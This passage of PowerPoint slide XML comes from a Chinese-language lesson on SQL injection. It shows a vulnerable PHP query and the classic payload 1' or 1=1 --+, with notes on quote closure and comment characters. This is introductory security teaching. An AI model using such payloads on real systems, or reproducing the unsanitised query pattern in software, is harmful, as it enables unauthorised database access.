              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="913765"/>
            <a:ext cx="1097280" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159000" y="3890010"/>
            <a:ext cx="1646555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’    --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="4074795"/>
            <a:ext cx="2011045" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注释和闭合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453640" y="4524375"/>
            <a:ext cx="1408430" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="4668520"/>
            <a:ext cx="2740660" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注释后面的内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453640" y="5235575"/>
            <a:ext cx="296545" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356735" y="5194935"/>
            <a:ext cx="3300095" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后面的语句全部无效了 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <mc:Choice Requires="p14">
          <p:contentPart p14:bwMode="auto" r:id="rId3">
            <p14:nvContentPartPr>
              <p14:cNvPr id="11" name="墨迹 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAE91F7-80F9-7E75-70E1-63F66E4C76F6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4456080" y="4298400"/>
              <a:ext cx="2255760" cy="878040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="墨迹 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAE91F7-80F9-7E75-70E1-63F66E4C76F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4446720" y="4289040"/>
                <a:ext cx="2274480" cy="89676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49860" y="5219065"/>
            <a:ext cx="8763000" cy="148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SQL语句</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>闭合</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834515" y="810260"/>
            <a:ext cx="1995170" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>什么是闭合？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1675130"/>
            <a:ext cx="7411085" cy="1150620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025390" y="1631315"/>
            <a:ext cx="911860" cy="1238250"/>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257665" y="1625600"/>
            <a:ext cx="2621280" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>两侧必须</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>要闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，代码才可以正确执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834515" y="1226820"/>
            <a:ext cx="3492500" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后台服务器PHP代码：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="2975610"/>
            <a:ext cx="7493000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果注入后，破坏了原有的闭合，注入就会失败！！！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4016375" y="810260"/>
            <a:ext cx="7559675" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>闭合保证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>语句可以完整正确的执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="下箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5252085" y="3418840"/>
            <a:ext cx="476250"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546475" y="3786505"/>
            <a:ext cx="4323080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所以，构造闭合的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8069580" y="1675130"/>
            <a:ext cx="812800" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"$id"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("$id")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(('id'))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="椭圆 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020050" y="1511300"/>
            <a:ext cx="911860" cy="159829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661535" y="4636135"/>
            <a:ext cx="2310130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寻找注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="下箭头 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243195" y="4215130"/>
            <a:ext cx="476250" cy="3810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28295" y="5238750"/>
            <a:ext cx="8310245" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>$sql = "SELECT * FROM users WHERE id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'$id'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> LIMIT 0,1";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328295" y="5732145"/>
            <a:ext cx="2540000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$id = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r 1=1 --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328295" y="6192520"/>
            <a:ext cx="8584565" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$sql = "SELECT * FROM users WHERE id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1' or 1=1 --+' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 0,1";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677035" y="4778375"/>
            <a:ext cx="2310130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>例子：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081135" y="5084445"/>
            <a:ext cx="3110865" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造语句：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一是把前面进行补全；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二是保证后面格式的正确。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081135" y="4636135"/>
            <a:ext cx="2310130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>总结一下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <mc:Choice Requires="p14">
          <p:contentPart p14:bwMode="auto" r:id="rId3">
            <p14:nvContentPartPr>
              <p14:cNvPr id="24" name="墨迹 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3AAE633-14F8-D6AE-1872-8A76EFF570BC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2277360" y="6087240"/>
              <a:ext cx="459360" cy="50040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="墨迹 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3AAE633-14F8-D6AE-1872-8A76EFF570BC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2268000" y="6077880"/>
                <a:ext cx="478080" cy="68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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="9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additive="base">
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="10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8" grpId="0"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="23"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450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SQL语句运算符</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
